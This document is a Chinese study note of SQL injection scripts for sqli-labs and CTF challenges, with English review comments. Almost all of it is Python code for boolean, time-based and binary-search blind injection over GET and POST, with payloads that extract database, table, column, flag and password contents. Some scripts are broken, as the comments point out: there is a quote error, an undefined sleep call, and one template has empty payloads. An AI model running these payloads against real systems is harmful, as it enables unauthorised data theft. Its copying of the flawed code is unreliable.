sql注入脚本笔记

GET型

bool盲注

import requests
import time
# Target is the local sqli-labs Less-5 lab page. `right` is the marker text
# whose presence in the response body is used below as the boolean oracle
# (marker present == injected condition evaluated TRUE).
url = "http://127.0.0.1/sqli-labs-master/Less-5/"
right = "You"

# 注意缩写,python缩写

def database_name():
    """Print the lab's database name, one lowercase letter at a time.

    Boolean-blind oracle against the local Less-5 lab: for each position
    1..99 and each letter a..z one GET is sent, and the letter is kept when
    the marker string `right` appears in the response body. Only lowercase
    letters are probed (see the inline note on the loop).

    NOTE(review): this function cannot run as written — the payload line
    below has unbalanced string quotes (the literal closes right after
    `?id=1`), which makes the whole module a SyntaxError.
    """
    name = ''
    for i in range(1,100):
        for j in "abcdefghijklmnopqrstuvwxyz":# when dumping a flag it is better to iterate ASCII codes so special characters are not missed
            payload = "?id=1" and substr((select database()),%d,1)='%s'--+"% (i,j)
            r = requests.get(url + payload)
            if right in r.text:
                name += j
                print(name)
database_name()

时间盲注

python时间函数的学习

import datetime
import time
now = datetime.datetime.now()  # current wall-clock time as a datetime
# NOTE(review): `sleep` is never bound in this snippet — only `import time`
# is present, so this line raises NameError as written; presumably
# time.sleep(2) was meant (same on the second sleep below).
sleep(2)
now1 = datetime.datetime.now()  # time after the pause
sec = (now1-now).seconds
# sec is 2
# .seconds is only the whole-second part of the difference; it ignores
# microseconds and days.
# total_seconds() gives the full difference between the two times.
now2 = time.time()  # current time as a float epoch timestamp
sleep(2)
now3 = time.time()  # no .seconds here, since this value is a float
import requests
import time
import datetime
url = "http://127.0.0.1/sqli-labs-master/Less-9/"
def get_database_len():
    """Return the length of the current database name on the Less-9 lab.

    Candidate lengths 1..19 are tried in order; the injected conditional
    sleeps for 2 s only when the guess is right, so a round trip of at least
    2 whole seconds is treated as the TRUE branch. Falls off the loop and
    returns None if no candidate matched (the caller then fails on
    `number+1`).
    """
    for i in range(1,20):
        payload = "?id=1' and sleep(if(length((select database()))=%d,2,0))--+"% (i)
        start = datetime.datetime.now()
        response = requests.get(url+payload)
        end = datetime.datetime.now()
        # .seconds truncates to whole seconds, so the response must really
        # take >= 2 s to count (1.99 s reads as 1).
        tt = (end-start).seconds
        if tt >=2:
            print(i)
            return i
def get_database_name():
    """Recover the database name one character at a time, printing progress.

    For each position 1..len, ASCII codes 32..125 (range end exclusive) are
    tried and a delayed response (>= 2 whole seconds) selects the character.
    The inner loop has no `break`, so every remaining candidate is still sent
    after a match — this is the slowness noted below the script.
    """
    number = get_database_len()
    name = ""
    for i in range(1,number+1): # +1 here, otherwise the last character is never dumped
        for j in range(32,126):
            payload = "?id=1' and sleep(if(ascii(substr((select database()),%d,1))=%d,2,0))--+"%(i,j)
            start = datetime.datetime.now()
            # `re` is just the response object here (this script does not
            # import the `re` module), but the name is easy to misread.
            re = requests.get(url+payload)
            end = datetime.datetime.now()
            ttt = (end - start).seconds # .seconds makes this an integer
            if ttt >=2:
                name += chr(j)
                print(name)
get_database_name()

### 有个缺点：速度太慢，可以进行算法优化

POST型

bool盲注

import requests
import re
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    """Return the database name length on the Less-13 lab, or None.

    Boolean oracle: the login response contains "flag.jpg" only when the
    injected condition is true. Candidate lengths 1..24 are tried in order;
    returns None implicitly if none matches.
    """
    for i in range(1,25):
        payload = "admin') and length((select database()))=%d #"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        html = requests.post(url=url, data=data)
        if "flag.jpg" in html.text:
            print(i)
            return i
def get_name_database():
    """Recover the database name character by character via the boolean oracle.

    Each position 1..len tries ASCII codes 30..129 and stops at the first
    match. The name is returned once the last position resolves; if the final
    position never matches the function returns None implicitly.

    NOTE(review): indentation was restored from an unindented paste; the
    trailing `break` is read as belonging to the match branch.
    """
    number = get_len_database()
    print(number)
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
                if i == number:
                    return name
                break
def get_name_table():
    """Print the comma-joined table names of the current schema, char by char.

    First runs (and prints) get_name_database(), then probes up to 29
    positions of the group_concat result with ASCII codes 30..129. There is
    no length probe and no `break` after a match, so every candidate is sent
    for every position; printing stops growing once positions are exhausted.
    """
    name = ""
    result = get_name_database()
    print(result)
    for i in range(1,30):
        for j in range(30,130):
            payload = "admin') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            html = requests.post(url=url, data=data)
            if "flag.jpg" in html.text:
                name += chr(j)
                print(name)
get_name_table()

时间盲注

import datetime
import requests
import time
url = "http://127.0.0.1/sqli-labs-master/Less-13/"
def get_len_database():
    """Return the database name length on Less-13 using a time-based oracle.

    The injected sleep is 3 s for a true guess, and a round trip of >= 2 s
    (float difference of time.time()) counts as true, leaving 1 s of slack.
    Candidate lengths 1..24; returns None implicitly if none matches.
    """
    for i in range(1,25):
        payload = "admin') and sleep(if(length((select database()))=%d,3,0))#"%(i)
        data = {"uname":payload, "passwd":"admin", "submit":"submit"}
        start = time.time()
        html = requests.post(url=url, data=data)
        end = time.time() # apparently only time.time() works here
        ttt = end-start
        if ttt >=2:
            print(i)
            return i
def get_name_database():
    """Recover the database name character by character via the time oracle.

    For each position 1..len, ASCII codes 30..129 are tried; a response that
    takes >= 2 s (the injected sleep is 3 s) selects the character. No
    `break` after a match, so all candidates are sent for every position.
    Progress is printed; nothing is returned.
    """
    number = get_len_database()
    name = ""
    for i in range(1,number+1):
        for j in range(30,130):
            payload = "admin') and sleep(if(ascii(substr((select database()),%d,1))=%d,3,0))#"%(i,j)
            data = {"uname":payload,"passwd":"admin","submit":"submit"}
            start = time.time()
            # print(data)
            html = requests.post(url=url, data=data)
            end = time.time()
            ttt = end - start
            # print(ttt)
            if ttt >= 2:
                name += chr(j)
                print(name)
get_name_database()

# 一定要注意 payload 不要写错，不然查错要查特别久。

二分法

通过post传参的脚本

用的时候修改post参数和个数

1.1 基于异或盲注,布尔盲注等:

import requests

# CTF lab login endpoint (POST) and the accumulator for the recovered string.
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''

# One character per outer iteration; the upper bound of 999 positions is only
# a safety stop — the loop exits as soon as a position resolves to 32.
for i in range(1, 1000):
    # Binary search over printable ASCII: [low, high] brackets the code.
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or ascii(substr(database(),{i},1))>{mid}#" #database
        #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#" #tables
        #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#" #columns
        payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#" #data
        data = {
            "name":payload,
            "pass":'qwer'
        }
        response = requests.post(url, data = data)
        # Boolean oracle: the marker 'u6216' in the page means the "> mid"
        # test held, so the answer lies above mid; otherwise at or below.
        if 'u6216' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # After the search low == high is the character code. low still at 32
    # means every "> mid" test was false, which is taken as end of string
    # (a literal space, code 32, is indistinguishable from the end here).
    if low != 32 :
        flag += chr(int(low))
    else:
        break
print(flag)

1.2 基于时间盲注:

import requests
import time

# CTF lab login endpoint (POST) and the accumulator for the recovered string.
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''

# One character per outer iteration; 999 positions is only a safety stop —
# the loop exits as soon as a position resolves to 32.
for i in range(1,1000):
    # Binary search over printable ASCII: [low, high] brackets the code.
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        #payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#" #database name
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" #table names
        #payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" #column names
        payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#" #data
        data = {
            "name":payload,
            "pass":'qwer'
        }
        # Timestamps are truncated to whole seconds, so the comparison below
        # is on second boundaries: a 2 s injected delay reads as 2 or 3,
        # a fast response as 0 or 1.
        last = int(time.time())
        response = requests.post(url, data = data)
        now = int(time.time())
        # Time oracle: a delayed response means the "> mid" test held.
        if now - last > 1 :
            low = mid + 1
        else :
            high = mid
        mid = (low + high) // 2
    # low == high is the character code; 32 means no test held -> end of string.
    if low != 32 :
        flag += chr(int(low))
    else:
        break
print(flag)

2.通过get传参的脚本

修改url 和 文本

2.通过get传参的脚本
修改url 和 文本

2.1 基于异或盲注,布尔盲注等:

import requests

# CTF lab search endpoint (GET); the payload is appended straight to `id=`.
url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''

# One character per outer iteration; exits when a position resolves to 32.
for i in range(1,1000):
    # NOTE(review): `min`/`max` shadow the builtins for the rest of this
    # script; harmless here because neither builtin is used afterwards, but
    # easy to trip over when extending the script.
    min = 32
    max = 128
    while min<max:
        # Binary search over ASCII 32..127; mid is recomputed at the top of
        # each pass (unlike the POST variant, which updates it at the bottom).
        mid = (min + max) // 2
        payload=f"1^(ascii(substr(database(),{i},1))>{mid})#" #database name
        #payload=f"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{i},1))>{mid})#" #table names
        #payload=f"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),{i},1))>{mid})#" #column names
        #payload=f"1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})#" #data
        response=requests.get(url=url+payload)
        # Boolean oracle: 'ERROR' in the page means the "> mid" test held.
        if 'ERROR' in response.text:
            min = mid + 1
        else:
            max=mid
    # min == max is the character code; 32 means no test held -> end of string.
    if min != 32 :
        name += chr(min)
    else:
        break
print(name)

2.2 基于时间盲注:

import requests
import time

# CTF lab search endpoint (GET), time-based template: the four payload slots
# are left blank here, so as written each request just appends a space to
# the URL and the oracle never fires.
url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''

# One character per outer iteration; exits when a position resolves to 32.
for i in range(1,1000):
    # NOTE(review): `min`/`max` shadow the builtins for the rest of this script.
    min = 32
    max = 128
    while min<max:
        mid = (min + max) // 2
        payload=f" " #database name
        #payload=f" " #table names
        #payload=f" " #column names
        #payload=f" " #data
        # Timestamps truncated to whole seconds; `now - last > 1` means the
        # response spanned at least two second boundaries.
        last = int(time.time())
        response=requests.get(url=url+payload)
        now = int(time.time())
        if now - last > 1:
            min = mid + 1
        else:
            max=mid
    # min == max is the character code; 32 means no test held -> end of string.
    if min != 32 :
        name += chr(min)
    else:
        break
print(name)

